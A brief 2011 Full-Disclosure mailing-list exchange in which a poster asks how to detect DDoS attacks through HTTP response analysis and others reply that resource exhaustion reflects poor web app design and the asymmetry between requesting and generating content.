2011/6/29 coderman : > 2011/6/26 김무성 : >> ... >> I'm looking for meterials or information, research about that how to detect >> DDoS attack through HTTP response analysis(throuput). > > you're asking the wrong question. > > instead of asking "How can I automagically detect exploitation of my > shitty app via HTTP Resp. codes" > > ask: "Why is my webapp so shitty that any number of arbitrary requests > lead to resource exhaustion?" > because fetching(or imitating to fetch) the result is always less resource intense than generating it? o_O Tyrael ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
